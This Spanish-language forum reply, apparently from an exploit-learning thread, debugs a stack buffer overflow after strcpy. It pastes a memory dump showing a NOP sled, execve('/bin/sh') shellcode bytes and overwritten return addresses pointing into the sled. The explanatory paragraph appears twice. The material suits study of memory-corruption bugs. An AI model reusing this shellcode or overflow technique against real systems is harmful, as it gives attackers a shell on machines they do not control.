Hola!!
Los datos que pedía era para ver cómo se estaba sobreescribiendo todos los valores hasta llegar a la dirección de RET en la pila. Lo mejor es poner un breakpoint justo despues de la la función strcpy y ver el estado de la pila, así podremos comprobar qué se ha sobreescrito y con qué valores.
Asi se queda mi pila una vez que se ejecuta strcpy.
En valor que esta en la dirección 0xbffff658 es el RET y contiene una direccion que apunta a los NOPS
Saludos
Los datos que pedía era para ver cómo se estaba sobreescribiendo todos los valores hasta llegar a la dirección de RET en la pila. Lo mejor es poner un breakpoint justo despues de la la función strcpy y ver el estado de la pila, así podremos comprobar qué se ha sobreescrito y con qué valores.
Asi se queda mi pila una vez que se ejecuta strcpy.
Código [Seleccionar]
0xbffff5d4: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff5e4: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff5f4: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff604: 0x90909090 0xeb909090 0x76895e1f 0x88c03108
0xbffff614: 0x46890746 0x890bb00c 0x084e8df3 0xcd0c568d
0xbffff624: 0x89db3180 0x80cd40d8 0xffffdce8 0x69622fff
0xbffff634: 0x68732f6e 0xbffff5e6 0xbffff5e6 0xbffff5e6
0xbffff644: 0xbffff5e6 0xbffff5e6 0xbffff5e6 0xbffff5e6
0xbffff654: 0xbffff5e6 0xbffff5e6 0xbffff5e6
En valor que esta en la dirección 0xbffff658 es el RET y contiene una direccion que apunta a los NOPS
Saludos